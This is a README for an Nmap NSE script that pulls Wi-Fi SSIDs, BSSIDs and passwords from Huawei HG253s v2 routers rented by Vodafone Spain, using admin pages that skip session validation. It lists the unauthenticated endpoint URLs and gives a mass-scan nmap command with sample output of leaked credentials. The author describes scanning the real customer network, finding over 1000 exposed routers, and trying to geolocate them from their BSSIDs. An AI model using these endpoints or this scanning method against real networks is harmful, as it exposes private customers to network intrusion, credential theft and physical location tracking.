
NSE script to search SSID, BSSID and password of the Huawei HG253S v2 from Vodafone Spain

Primary LanguageLua



Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version.

The pre-scholar bug


I found a new simple security bug in that new firmware version. It is so easy to see it that I named it "the Pre-scholar bug". Basically, it is not validating the session cookie in some administration webpages:

  • http://<IP>/html_253s/api/ntwk/WlanBasic
  • http://<IP>/html_253s/api/system/diagnose_internet
  • http://<IP>/html_253s/api/system/hostinfo?type=ethhost
  • http://<IP>/html_253s/api/system/hostinfo?type=guesthost
  • http://<IP>/html_253s/api/system/hostinfo?type=homehost
  • http://<IP>/html_253s/api/system/hostinfo?type=wifihost
  • http://<IP>/html_253s/api/system/wizardcfg

So, It is possible to get direct information from those urls in any router open to internet.

About the NSE script

This is a Nmap NSE script to search Vodafone-Spain Huawei 253s_v2 router with the port 80/tcp and/or 443/tcp open to Internet (via this new bug).

The script will try to get the SSID, BSSID, key-type and Password of the wifi network interface.

It was tested with:

  • Firmware: V100R001C205B038SP0x (being x a number)

Command line and result:

nmap -sS -p80,443 -script http-enum-vodafone-hua253s.nse x.x.x.*

Nmap scan report for xxxxxxxx.dyn.user.ono.com (x.x.x.x)
Host is up (0.089s latency).
80/tcp  filtered http
443/tcp filtered https

Nmap scan report for xxxxxxx.dyn.user.ono.com (x.x.x.x)
Host is up (0.091s latency).
80/tcp  open  http
|_http-enum-vodafone-hua253s:   SSID: vodafone851X (c4:07:2f:89:xx:xx)   Pass(AES): FSLJLMZFC3W9XX
443/tcp open  https
|_http-enum-vodafone-hua253s:   SSID: vodafone851X (c4:07:2f:89:xx:xx)   Pass(AES): FSLJLMZFC3W9XX

Nmap scan report for xxxxxxx.dyn.user.ono.com (x.x.x.x)
Host is up (0.089s latency).
80/tcp  filtered http
443/tcp filtered https


I have checked the Spanish Vodafone network trying to guess what the real scope is and I found >1000 routers with the "correct" brand, open port to internet and the bug working.



After speaking to a friend of mine, I was trying to geolocate this routers using Google geolocate API and the found BSSID. But it was not possible. The spanish BSSID (MAC address) database by google seems very poor. All my tries got a "Not found" answer :,(

Using other IP location services was worse. They are completely inaccurate.

I tried it with https://wigle.net/ and it is working but its API is very limited. I wrote to the wigle's owner but he wanted bread... so, you only can shoot to five or six bssid per day in that webpage :(


  • Sorry for my ugly English.
  • Oldschool is alive.